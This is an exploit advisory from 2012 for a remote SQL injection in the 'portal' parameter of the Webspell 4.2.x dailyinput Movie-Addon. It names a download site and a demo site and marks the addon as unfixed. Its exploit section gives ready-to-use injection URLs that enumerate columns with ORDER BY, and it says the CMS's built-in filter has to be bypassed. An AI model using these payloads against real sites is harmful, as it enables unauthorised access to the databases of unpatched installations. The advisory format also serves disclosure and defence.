38 lines
No EOL
1.5 KiB
Text
38 lines
No EOL
1.5 KiB
Text
========================================================================================
|
|
| # Title : Webspell 4.2.x dailyinput Movie-Addon SQL Injection Vulnerability
|
|
| # Author : Easy Laster
|
|
| # Script : Webspell 4.2.x dailyinput Movie-Addon
|
|
| # Site : www.kode-designs.com
|
|
| # Download : www.setgaming.de/index.php?site=files&file=26
|
|
| # Demo : www.setgaming.de/index.php?site=videos
|
|
| # Price : free
|
|
| # Exploitation : Remote SQL Vulnerability
|
|
| # Bug : Remote SQL Vulnerability
|
|
| # Date : 08.06.2012
|
|
| # Language : PHP
|
|
| # Status : vulnerable
|
|
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest
|
|
====================== Proof of Concept =================================
|
|
|
|
|
|
[+] Introduction
|
|
|
|
dailyinput Movie-Addon is a Addon for the Webspell Web Application the Content Management
|
|
System. In this Addon we found a Remote SQL Injection vulnerability.The Movie file
|
|
is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most
|
|
Webspell Webapplication has a Security System in the Webspell core self.You must bypass
|
|
the core from Webspell Security System (globalskiller).
|
|
|
|
|
|
[+] Vulnerability
|
|
|
|
http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=[vul]
|
|
|
|
[+] Exploit
|
|
|
|
http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+5--+
|
|
http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+4--+
|
|
|
|
[+] Fix
|
|
|
|
No fix. |